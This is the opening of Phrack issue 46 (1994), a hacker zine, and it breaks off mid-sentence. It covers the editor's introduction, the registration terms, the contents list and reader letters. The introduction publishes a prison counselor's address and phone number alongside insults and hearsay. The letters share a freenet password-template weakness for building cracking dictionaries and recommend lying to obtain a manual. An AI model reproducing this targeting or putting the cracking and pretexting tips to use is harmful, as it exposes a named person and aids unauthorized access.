==Phrack Magazine== Volume Five, Issue Forty-Six, File 1 of 28 Issue 46 Index ___________________ P H R A C K 4 6 September 20, 1994 ___________________ "La cotorra que chi, no canta" Honey, I'm home! Anyway, like the little proverb above indicates, I've been a very busy man since the last issue. I've been denied entry to a federal prison in North Carolina (imagine the irony of THAT); I've been whoring in the Red-Light District of Amsterdam with military intelligence officers from England, Spain and the US; estuve chicaito en Nuevo Lardeo; I've tested wireless networks in Canada; and I've been on TV a few more times. (No, nimrod, Phrack is not my job...I WORK for a living.) Needless to say, it has been a chore for me to get Phrack out at all, much less only a month or so past my self-imposed quarterly deadline. But hell, I love doing this magazine, so here it is. Phrack is the only way I can completely thrill and simultaneously piss off so many people at once, so I don't think I'll stop any time soon. Pissing people off. It's what I like to do, and it would appear that I'm quite good at it. I realize that there are several extremely vocal erikb-bashers out there. And to them I say, "smooches!" Let's face it, sour grapes make bad whiners. But hey, "As long as they're talking about Erikb, let 'em talk." (Sorry Mr. Ford) Besides piecing together this issue, I've been working on getting the WWW pages together. They still aren't 100%, but they are getting there. By the time I finally get them together, the Phrack Web Site should be the ultimate underground resource on the net. Check it out: http://freeside.com/phrack.html You may be interested in the federal prison remark from the first paragraph. I had a meeting at IBM out in Research Triangle Park. I figured that this would be an ideal time to go see Co/Dec who still has several years of federal time left to serve. Co/Dec is in the Federal Correctional Institute at Butner, North Carolina, a short 30 or so minutes from where I was staying in RTP. Anyway, I receive the necessary forms from Co/Dec to get on the approved visitors list, and sent them back in. After several weeks, Co/Dec said that I still had not been added. My trip was slated for a week away, so I called his counselor, Wilbert LeMay. Mr. LeMay told me that he never got my forms. I then fed-ex'ed a copy (that I luckily had kept). It arrived on Friday morning, and I was to arrive on Monday. Mr. LeMay had assured me that it would be no problem to get me added to Co/Dec's list. When I arrived on Monday, I called the prison to make sure the visit had been cleared. Mr. LeMay would not return my calls. In fact, not only would he not return any of the 5 or so calls I made, but he didn't even bother to enter my name on the visitor list until the Wednesday after I had already left North Carolina. I'm sorry, but this man must be a real prick. A bit of background on LeMay. First off, according to those on the inside, LeMay dislikes white people. He supposedly keeps a picture of slaves picking cotton on his desk as a constant reminder of the oppression his people were subjected to. But perhaps working in the prison system where you have constant view of the Aryan Brotherhood in action, I'm sure many would begin to feel likewise. (Can't we all just get along?) Secondly, LeMay dislikes Co/Dec. He put Co/Dec in solitary confinement for weeks because Co/Dec had a DOS MANUAL! A fucking DOS MANUAL! You do not put someone in the fucking hole for brushing up on the syntax for xcopy! You put them in the hole for inciting a fucking shank war, or for stealing food, or for punching a guard. Later, Co/Dec found himself in solitary confinement AGAIN because he traded some smokes for telephone parts he was going to use to fix a radio. The hole again. Not for weapons and drugs, NO! Much worse: wires and a speaker! The prison now considers Co/Dec a security risk, and read all OUTGOING mail he sends. Not just the regular reading of all incoming mail that any inmate would expect. He can't take any clases, he's had several more days added to his sentence for "bad time served," and in addition, all of his phone calls are live monitored and recorded. (A funny note, during one conversation I found that my touchtones would control the equipment they were using to record the call. The equipment they were using was improperly connected and gave off a terrible hum when activated. I kept turning off the recording, and the security officer kept having to turn it back on.) All of this, due to Counselor Wilbert LeMay. Thanks guy. If someone can so grossly abuse their power to completely remove the dignity of another human being, inmate or otherwise, that person needs to face severe disciplinary action. I'm writing the warden. Directory Assistance says that Wilbert can be reached at: Wilbert LeMay 701 East E St. Butner, NC 27509 919-575-6375 Fun fact: Butner is serviced by GTE. You know, its pretty odd that as hackers, we probably know a larger number of ex-cons and current inmates than most people. But anyway, on to Phrack. This issue is pretty odd in that "The Man" has consented to write a few syllables for us to distribute. Yes, Winn Schwartau submitted his unique perspectives of Defcon and HOPE. It's funny how many people left Defcon this year and ran home to find information on HIRF weapons after hearing Winn speak. (If you've actually built one by now, email me.) What else? GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs, Conferences, and an incomplete university dialup list. (Putting out an incomplete list really irritates me, but hell, its taking a LOT longer than I expected to get some 1300 dialups without more help. AHEM!) Can you dig it? I knew that you could. ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Cost is $100.00 US per user for subscription registration. Cost of multi-user licenses will be negotiated on a site-by-site basis. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. Enclosed is $________ We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Hard Copy: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- Enjoy the magazine. It is for and by the hacking community. Period. Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 3L33t : Ice-9 (for helping me get this done!) Rad Band : Green Day News : Datastream Cowboy Photography : The Man Prison Consultant : Co / Dec The Young Girl : Jane March Motor Trend's Car of the Year : The 2600 Van Dickhead of the Month : Wilbert LeMay at FCI Butner Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher Hitman Italy, Herd Beast, Dr. Delam, Maldoror, The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey Special Thanks To : Winn Schwartau Phrack Magazine V. 5, #46, September 20, 1994. ISSN 1068-1035 Contents Copyright (C) 1994 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list. Phrack Magazine 603 W. 13th #1A-278 (Phrack Mailing Address) Austin, TX 78701 freeside.com (Phrack FTP Site) /pub/phrack http://freeside.com/phrack.html (Phrack WWW Home Page) phrack@well.sf.ca.us (Phrack E-mail Address) or phrackmag on America Online Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) ** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED ** Phrack goes out plaintext...you certainly can subscribe in plaintext. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg== =q2KB -----END PGP PUBLIC KEY BLOCK----- -= Phrack 46 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 17 K 2. Phrack Loopback / Editorial 52 K 3. Line Noise 61 K 4. Line Noise 56 K 5. Phrack Prophile on Minor Threat 12 K 6. Paid Advertisement 62 K 7. Paid Advertisement (cont) 45 K 8. The Wonderful World of Pagers by Erik Bloodaxe 24 K 9. Legal Info by Szechuan Death 13 K 10. A Guide to Porno Boxes by Carl Corey 13 K 11. Unix Hacking - Tools of the Trade by The Shining 42 K 12. The fingerd Trojan Horse by Hitman Italy 32 K 13. The Phrack University Dialup List 12 K 14. A Little About Dialcom by Herd Beast 29 K 15. VisaNet Operations Part I by Ice Jey 50 K 16. VisaNet Operations Part II by Ice Jey 44 K 17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25 K 18. Startalk by The Red Skull 21 K 19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45 K 20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42 K 21. The Groom Lake Desert Rat by PsychoSpy 44 K 22. HOPE by Erik Bloodaxe 51 K 23. Cyber Christ Bites the Big Apple by Winn Schwartau 60 K 24. The ABCs of Better Hotel Staying by Seven Up 12 K 25. AT&T Definity System 75/85 by Erudite 13 K 26. Keytrap v1.0 Keyboard Key Logger by Dcypher 35 K 27. International Scenes by Various Sources 44 K 28. Phrack World News by Datastream Cowboy 38 K Total: 996 K _______________________________________________________________________________ "Most hackers would have sold out their mother." Justin Tanner Peterson "Treason is loved of many but the traitor hated of all." Robert Greene (1552-1592) "They smile in your face, but all the while they want to take your place." The O'Jays ==Phrack Magazine== Volume Five, Issue Forty-Six, File 2 of 28 **************************************************************************** Phrack Loopback ------------------------------------------------------------------------------ I'd like to write you about my friends cat. His name is 'Cid. Cid loves reading, in fact he'll read just about anything, from the labels on his cat food tins to the instructions on the "real" use of his Grafix (incense burner :) ). Well one take, 'Cid (or was it me) was indulging in the reason he got his moniker and mentioned that he'd like to receive Phrack. Well i told him he could just subscribe to it and then he went into a real sob story about how he doesn't have net access. So as a favor to 'Cid (who really does exist, and really has tripped out on brain blotters) i'd like to subscribe to Phrack. [You my want to take note that Phrack can also be printed on paper. Now, that's a lot of blotter. You've got your subscription, now go watch some anime.] ------------------------------------------------------------------------------ I recently got a new job and shortly after beginning working there, they decided to retool and reorganize a bit for better productivity. While we were going through some old boxes and stuff, I came across a little black box with the words "Demon Dialer" molded into the front of it, it even had the (functional!) 20volt power supply. Needless to say I was pretty happy with my find. I asked if I could have it and since no one else there seemed to know what to make of it, mine it was! My only problem now... I've played around with it, and it seems to do a lot more than what I originally thought, but the fact of the matter is.. I really haven't the foggiest idea of how to get it to REALLY work for me. If anyone has any information, or better still, actual documentation for a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me. Also, something rater strange. The phone cable attached to it had a normal looking 4-wire connector on one end, but the other was split to have RJ jacks, one with the yellow-black combo and one with the red-green. The split ends (sorry :)) were plugged into the WALL and PHONE jacks on the demon dialer. The purpose for this perplexes me since one's supposed to be input and one's supposed to be a passthrough for the phone to be plugged into. Anyway, any info would be nice. Thanks guys. [Telephonics was one of those odd telco device manufacturers back in the 80's. They made the demon dialer (a speed dialing device), a two-line conference box, a divertor, etc. Essentially, they provided in hardware what the telco's were beginning to roll-out in software. I think the line splitter you have was merely plugged into those two jacks for storage purposes. What that probably was for was to allow two lines to use the Demon Dialer. It was probably just reversed when your company boxed it so it wouldn't get lost. I'm not sure if Telephonics is still in business. A good place to start looking for info would be comp.dcom.telecom or alt.dcom.telecom. Another good place may be Hello Direct (800-HI-HELLO). They used to do have Telephonics equipment available for mail-order.] ------------------------------------------------------------------------------ I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare. Supposedly it intersperses tales of his exploits with code and examples. I have big doubts, but have you heard anything good/bad about it? [Your doubts are well founded. I got an advance copy of that book. Let's put it this way: does any book that contains over a dozen pages of "common passwords" sound like ground breaking material? This book is so like "Out of the Inner Circle" that I almost wanted to believe Knightmare (Dennis Fiery) was really yet another alias for Bill Landreth. Imagine "Out of the Inner Circle" with about a hundred or more extra pages of adjectives and examples that may have been useful years back. The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray gave law enforcement a big buffer of the Black Ice Private BBS and help spark the infamous LOD Hacker Crackdown, certainly didn't have anything to do with this. In fact, the book has a kind of snide tone to it and is so clueless, that leads me to believe it may have been written by a cop or security type person looking to make a quick buck. As far as source code, well, there is a sample basic program that tries to emulate a university login. If you want a good book, go buy "Firewalls and Internet Security" by Cheswick and Bellovin.] ------------------------------------------------------------------------------ Hey Chris, I'm sure you are under a constant avalanche of requests for certain files, so I might as well add to your frustration . I know of a program that supposedly tracks cellular phone frequencies and displays them on a cellmap. However, I don't know the name of the program or (obviously) where to find this little gem. I was wondering if you could possibly enlighten me on a way to acquire a program similar to the one I have described. I have developed some other methods of tracking locations of cellular calls. However my methods rely on a database and manually mapping cellular phones, this method is strictly low tech. Of course this would be for experimental use only, therefore it would not be used to actually track actual, restricted, radio spectrum signals. I wouldn't want the aether Gestapo pummeling our heads and necks. [I don't know of anything that plots frequencies on a cellmap. How would you know the actual locations of cells for whatever city you may be in to plot them accurately? There are a number of programs written to listen to forward channel messages and tell you when a call is going to jump to another channel. The cellular telephone experimenter's kit from Network Wizards has a lot of nice C source that will let you write your own programs that work with their interface to the OKI 900. I suppose you could get the FCC database CD-ROM for your state and make note of longitude and latitude of cell sites and make your own database for your city, and then make a truly visual representation of a cellmap and watch calls move from cell to cell. But I don't think there is such a thing floating around the underground at present. Of course the carriers have this ability, and are more than happy to make it available to Law Enforcement (without a warrant mind you). Hi OJ! email Mark Lottor mw@nw.com for more info about the CTEK.] ------------------------------------------------------------------------------ I saw this in a HoHoCon ad: Top Ten Nark List 1. Traxxter 2. Scott Chasin 3. Chris Goggans 4. Aget Steal 5. Dale Drrew 6. Cliff Stoll 7. [blank] 8. Julio Fernandez 9. Scanman 10. Cori Braun What did Chris Goggans do? Isn't he Erik Bloodaxe, the publisher of Phrack? I sincerely doubt that the feds would have someone working for them that puts out a publication like Phrack. It would be way too much of an embarrassment for them. I wrote to the editor of Phrack when I read that Agent Steal said that the publisher of Phrack was a Fed - IN PHRACK no less. He said it was a stupid rumor. Is there anything to support this fact? And why is there now some manhunt for Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly their employee? The whole thing is very confusing to me. Please explain. If Goggans isn't Bloodaxe then he'd Knight Lightning (this just came to me). Nevertheless, what's the story here? [First off, I think you take things a little too seriously. If you are on a nark hunt, worry about your associates, not people you obviously don't even know. Chris Goggans (ME) is most positively Erik Bloodaxe. Thanks for remembering. Agent Steal was involved with the FBI. This is a fact. In his case, he even appeared to have some kind of immunity while trying to gather information on other hackers like Mitnik and Poulsen. This immunity is under scrutiny by the Bureau's own Internal Affairs (or so the new rumors go), since Steal was pulling a fast one and committing crimes the Bureau didn't know about to get some quick cash while he set up his friends. My story is a bit more convoluted. You can sum it up by saying, if you interfere with my businesses, I'll try my best to track you down and turn you in. I guess I am a nark.] ------------------------------------------------------------------------------ I read in the last Phrack (45) that you wanted someone to write a few words on scrambling systems. Give me a rough outline of what you want and I'll see if I can help :-) Basically I wrote the Black Book (European Scrambling Systems 1,2,3,4,5 and World Satellite TV & Scrambling Methods) and also edit Hack Watch News & Syndicated HackWatch. They all deal with scrambling system hacks as opposed to computer hacking & phreaking. (Things are a bit iffy here as regards phreaking as all calls are logged but the eprom phone cards are easy to hack) Oh yeah and another claim to fame ;-) if you can call it that, is that I was quoted in an article on satellite piracy in "Wired" August issue. This Hawkwind character that you had an article from in Phrack43 sounds like a *real* hacker indeed :-> Actually there is an elite in Ireland but it is mainly concerned with satellite hacking and that Hawkwind character is obviously just a JAFA (Irish hacker expression - Just Another Fu**ing Amateur). Most of the advanced telco stuff is tested in the south of the country as Dublin is not really that important in terms of comms - most of the Atlantic path satellite comms gear and brains are on the south coast :-) Actually the Hawkwind article really pissed off some people here in Ireland - there were a few questions asked on my own bbs (Special Projects +353-51-50143) about this character. I am not even sure if the character is a real hacker or just a wannabe - there were no responses from any of his addresses. SP is sort of like the neutral territory for satellite and cable hacking information in Europe though there are a few US callers. With the way things are going with your new DBS DirecTv system in the US, it looks like the European satellite hackers are going to be supplying a lot of information (DirecTv's security overlay was developed by News Datacom - the developers of the totally hacked VideoCrypt system here in Europe). There telco here uses eprom phone cards. These are extremely easy to hack (well most real hackers in .IE work on breaking satellite scrambling systems that use smart cards) as they are only serial eprom. Regards [About the satellite information: YES! Write the biggest, best article the whole fucking hacker world has ever seen about every aspect of satellite tv!! Personally, I'm more interested in that than anything else anyone could possibly write (seeing as how I'm about to buy a dish for both C and Ku). About Hawkwind's article on hacking in Ireland: If I were to write an article about hacking in America, it would be entirely different than anyone else in America would write. A country is a big place. Just because someone else's hacking experience is different than your own, it's no reason to discredit them. However, if your exposure to the scene in Ireland is so completely different than Hawkwind's, I would LOVE to print it as well.] ------------------------------------------------------------------------------ The Columbus Freenet uses a password generating routine that takes the first and last initial of the user's real name, and inserts it into a randomly chosen template. Some of the templates are: E(f)www5(l) (f)22ww5(l) where f and l are first and last initials (f)2ww97(l) (f)2ww95(l) and so on. There are not too many of these templates, I guess maybe 50. I imagine most people go in and change their password right away, but then again that's what a prudent person would do (so they probably don't). Columbus 2600 meetings: Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the first 2600 meetings in Columbus, unfortunately hardly anyone shows up... I don't know why HP is so dead in Central Ohio, but fear and paranoia run rampant. That's all for now...keep up with the good work! R.U.Serius?! [Hmmm...templates are always a bad thing. All one has to do is get the program that generates them, and viola, you've got a pre-made dict file for your crack program. Not very smart on the part of the Freenet, but hacking a Freenet, is like kicking a puppy. I hope more people go to your 2600 meetings. The ones here in Austin kinda died out too. Maybe our cities are just lame.] ------------------------------------------------------------------------------ A complaint: That piece about McDonald's in Phrack 45 was, in a word, LAME. Surely Phrack can do better. Maliciousness for its own sake isn't very interesting and frankly the article didn't have any ideas that a bored 13-year-old couldn't have thought up--probably written by one. That aside, I found some good stuff in there. Some of it was old news, but Phrack serves an archival purpose too, so that was ok. On a more personal note, I could really relate to your account of HoHoCon--not that I was there, just that I have started to feel old lately even though I don't turn 25 for another 2 days :) Sometimes I feel myself saying things like "Why, sonny, when I was your age the Apple II was king..." Keep up the good work, and don't let the lamers get you down. [Thanks for the letter. I personally thought the McDonald's file was a laugh riot. Even if it was juvenile and moronic, I wouldn't expect anyone to analyze it and go through with anything it contained. It was just for fun. Lighten up :) I am glad to see that at least someone else recognizes that Phrack is attempting to serve as an archive of our subculture, rather than just a collection of technical info that will be outdated overnight, or a buglist that will be rendered mostly unusable within hours of release. There is so much going on within the community, and it is becoming such a spectacle in the popular media, that in 20 years, we can all go back and look at Phrack and remember the people, places, and meetings that changed the face of the net. Or maybe I'm just terribly lame, and either 1) refuse to put in the good stuff, 2) don't have access to the good stuff, 3) exist only as a puppet agent of The Man, or 4) Don't know nothin' 'bout Telco! But you know what they say about opinions.] ---------------------------------------------------------------------------- I have a few comments on your editorial in Phrack 44 (on information wants to be free). Thanks for voicing an opinion that is shared by many of us. I am glad to see a public figure in the CuG with nutz enuff to actually come out and make such a statement and mean it. Again, thanks. Now on the subject of hacking as a whole. Is it just me, or are the number of losers on the increase? There have always been those who would try and apply these skills to ripoff scams and system trashing but now that seems to be the sole intent of many of the "hackers" I come into contact with. What ever happened to hacking to learn more about the system. To really hack a system (be it phone, computer), is a test of skill and determination, and upon success you walk away with a greater understanding of the machine and its software. Hacking is more than just knowing how to run crack on a filched password file, or using some exploitation scripts picked up on IRC, it is a quest for knowledge and gaining superiority over a system by use of great skill acquired by a deliberate effort. Once was a time when things like toll fraud (I do miss blue boxes) were a means to an end, now they seem to be the end in itself. Also, I am researching info on OSI comsec procedures and have found some really interesting goodies, if you are interested in publishing my piece when completed, let me know.. [(NOTE: This came from a .mil) Man, I'm glad to see that people in the armed forces still have minds of their own. Not many people would express such a thing openly. Yes, the destructive/profit-motivated trends of many of the hackers of today are pretty sad. But you have to realize, as the technology becomes more and more like consumer electronics, rather than the traditional mold of computer as scientific research tool, an entirely different market segment will be exposed to it and use the technology for less than scrupulous means. Even the act of hacking itself. Today, I can basically gain access to any model of system known to man by asking. I realize that there are many who cannot accomplish such a thing, but with the proliferation of public access sites, almost everyone can afford access to the net to explore and learn. The point comes down to this: if you have an account on a Sun, why do you need an account on a Sun at Boeing, unless you either 1) want to sell the cad files of the 777 to Airbus or McDonnell-Douglas 2) want to get financial information to make a killing on Wall Street, or 3) just want to have an ego boost and say "I OWN BOEING!" Personally, I can understand the ego boost aspect, but I've decided that I'd much rather get paid by a company like Boeing to hack for them than against them. I don't want to sell anyone's info, so hacking into any company is basically useless to me, unless they are paying me to look for potential weaknesses. Granted, it's not an easy market to get into, but it's a goal to shoot for. And for those who find it impossible to quit due to fear of losing their edge, check out my editorial in this issue for a possible solution.] ------------------------------------------------------------------------------ I am looking for a Macintosh app that does the same thing as an app called "Demon Dial" that has been lost in the annals of software history due to the fact that some people (sysops) question whether it is illegal software (it dials up a series of phone #'s looking for data connections). Do you know where I could find an application for the Mac that does this simple function? [We had a guy ask in an earlier issue for Macintosh hacking/phreaking apps. Noone responded. Hell, I know SOMEONE has to use a Mac out there. Are you Mac-weenies all embarrassed to speak up? Hell, uuencode and email me your aps, and I'll put them up for ftp! Help out your poor fellow Macintosh users. I certainly would if I could, but the thought of touching a Mac gives me the chills.] ------------------------------------------------------------------------------ Have you ever heard of being denied access to your own cell phone? I am currently in the process of buying a cell phone and was informed that I COULD NOT have the programming guide of the security code they enter to program my phone. In my opinion the key word is "MY." If I get a digital security system for my house you better damn well figure I will have the security codes for that. The phone was a Motorola flip phone. I called Motorola and explained how displeased I was with this company and they said they could not interfere with a reps. policy. When I was selling car phone we kept the programming guide unless they asked for it. I demanded it and they laughed in my face. Who said "the customer is always right" anyway? Thanks, any info is greatly appreciated. By the way, you wouldn't happen to have the CN/A number for 815 would you? Also, any ANAC would be very helpful. [Well, I hate to say it, but you got typical service from your cellular agent. Let's face it, these sales reps probably knew about as much about that programming manual as I do nuclear physics: "Its confusing, but if you understand it, you can fuck things up." I am surprised that Motorola wouldn't sell you the book though. Motorola will sell anybody anything. You probably called the wrong place. Moto is so huge they've got multiple groups working on somewhat similar technologies with absolutely no communication between the groups. Sometimes they are in different countries, but sometimes they are in the same city! I would suggest you call a local FAE (Field Applications Engineer) and get them to get the book for you. Make up some story about working on some computer controlled application with the phone, and that you need any and all documentation on the phone. They'll do it. Money is money. As far as the 815 CNA, hell, just call the business office. I haven't called a CNA in years, only the business office. They are nice people. And no PINs. 815 ANAC: ok guys, someone must have one...email it! "The customer is always right" wasn't in Bartlett's or Columbia's books of famous quotations. I guess that phrase has been written out of out history. So, from now on you aren't always right, I guess.] ------------------------------------------------------------------------------ Dear Phrack: We want you! We want you to be a part of our cutting edge documentary that is traversing across the "NEW EDGE" of computers, culture, and chaos. Working in conjunction with Douglas Rushkoff, the best selling author of "CYBERIA," we are currently gathering together the leaders of this technological and cultural revolution. This is not a documentary in the traditional sense of the word. It is more of an exploration, a journey, a unique vision of the world as seen through the eyes of those who live on the bleeding edge; where technology, art, science, music, pleasure, and new thoughts collide. A place people like you and me like to call home. "New Edge" will deliver a slice of creativity, insanity, and infallibility, and feed those who are hungry for more than what Main Street USA has to offer. This project will detonate across the US and around the world. It will become the who's who of the new frontier and you belong on it's illustrious list of futurians. Please look over the enclosed press release description of the project. Phrack has long been the ultimate source for hack/phreak info, and helped to push the limits of free speech and information. The role that Phrack has played in the Steve Jackson Games Case set an important precedent for CyberLaw. We will also be interviewing several people from the EFF. Please call me ASAP to schedule an interview for "New Edge", or send me E-Mail. Sincerely, Todd LeValley Producer, N E W E D G E (310) 545-8138 Tel/Fax belief@eworld.com W E L C O M E T O T H E W O R L D O N T H E E D G E O F T H E F U T U R E W E L C O M E T O T H E N E W E D G E -the documentary- T h e O r g a n i z a t i o n Belief Productions in association with Film Forum. T h e M i s s i o n Journey through the labyrinth of cyberia and experience the people, places and philosophy that construct cyberspace and the shores of the technological frontier. This fast paced visual voyage through the digital revolution will feature interviews with the innovators, artists, cyberpunks, and visionaries from all sides of the planet. These specialists are the futurists who are engineering our cybergenic tomorrow in laboratories today. Along the way we will investigate the numerous social and political issues which are cropping up as each foot of fiber optic cable is laid. Artificial intelligence, the Internet, nanotechnology, interactive media, computer viruses, electronic music, and virtual reality are just a few of the many nodes our journey will explore. T h e F u n d i n g This exploration is sponsored in part by a grant from The Annenberg Foundation in association with the LA based non-profit cutting-edge media group Film Forum. T h e P r o c e s s The New Edge project will capture moving images with a variety of input devices and then assemble them into one fluid documentary using Apple Macintosh Quadras & PowerMac computers. The post production work will be done entirely on the computers using the Radius Video Vision Telecast Board in conjunction with Quicktime software applications such as Adobe Premiere 4.0 and CoSA After Effects 2.01. The final piece will be recorded to BETACAM SP videotape for exhibition and distribution. The capture formats for the project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film, 35MM Stills, and the Fisher Price Pixelvision 2000. T h e R e s u l t s New Edge will pride itself on an innovative visual and aural style which before today, could only be created on high-end professional video systems and only for short format spots. The New Edge documentary will be two hours in length and will have a dense, layered look previously featured only in much shorter pieces. New Edge will be a showcase piece not only for the content contained within, but for the way in which the piece was produced. It will be a spectacular tribute to the products and technology involved in its creation. D i s t r i b u t i o n Direct Cinema - Distributes videos to Libraries, Schools, and Universities throughout the United States. Mico Entertainment/NHK Enterprises - Provider of American programming for Japanese Television. Labyrinth Media Ltd. - European reality-based documentary distributor T h e A u d i e n c e New Edge is aimed at both the technophiles and technophobes alike. While the show will feature very complex and sophisticated topics, the discussions will be structured to appeal to both those who do and do not have the technical framework that underlines the cyberian movement. The show's content and style will make it readily available to the MTV and Generation X demographic groups as well as executives who want to stay on top of the latest technological advances. Individuals who read Mondo 2000 and Wired magazine will also naturally latch on to this electronic presentation of their favorite topics. T h e G u i d e s Mike Goedecke - Director/Graphic Designer Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game entitled Sim City. Acting as graphic designer for the Voyager Co.- Criterion Laser Disc Division his work is featured on titles such as: Akira, DEVO-The Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus. Most recently he collaborated with Los Angeles Video Artist Art Nomura on a video installation piece entitled Digital Mandala. The piece was edited, composited , and mastered to Laser Disc using an Apple Macintosh Computer and off-the-shelf software. The installation is scheduled to tour museums and art galleries across the United States and Europe. While attending Cinema/Television Graduate School at the University of Southern California, Mike directed the award winning documentary short Rhythm, which celebrates various musical cultures. Todd LeValley - Producer/Graphic Designer Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a documentary that introduces the electronic underground. This project has been warmly received at numerous "Cyber Festivals" around the country, as well as at the Director's Guild Of America, and is currently being distributed by FringeWare Inc. Todd's commercial experience includes being the in-house graphic designer for Barbour/Langley Productions designing, compositing, and producing the graphic packages for several 20th Century Fox Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel. Todd is a graduate of the Cinema/Television program at Loyola Marymount University. Jeff Runyan - Cinematographer/Editor Jeff received an MFA from the University of Southern California's Graduate School of Cinema/Television with an emphasis in cinematography and editing. He studied cinematography under the guidance of Woody Omens, ASC. and Earl Rath, ASC., and editing with Edward Dmytryk. Jeff was the cinematographer on the award wining documentary Rhythm. He has recently completed shooting and editing a documentary on Academy Award winning Cinematographer Conrad Hall for the ASC and has just finished directing a short film for USC Teleproductions. Douglas Rushkoff - Cyber Consultant/Author Douglas is the author of the best selling Harper Collins San Francisco novel, Cyberia. He spent two years of his life living among the key players in the cyber universe. Douglas knows the New Edge well and is providing us with the map to its points of interest, rest stops and travelers. For more information, please contact: Todd LeValley, Producer Belief Productions (310) 545-8138 belief@eworld.com [Dear New Edge: You have got to be kidding me. "Readers of Wired and Mondo 2000 will naturally latch on to this electronic presentation of their favorite topics?" Aren't we awful fucking high on ourselves? Christ. Mondo & Wired readers and writers (and stars) are themselves so fucking far removed from the real meat of the underground, that they wouldn't even be able to relate to it. Obviously this "documentary" is going to be aimed at the wannabes who sit at home furiously masturbating to "Cyborgasm" while installing FRACTINT, being very careful not to soil their copy 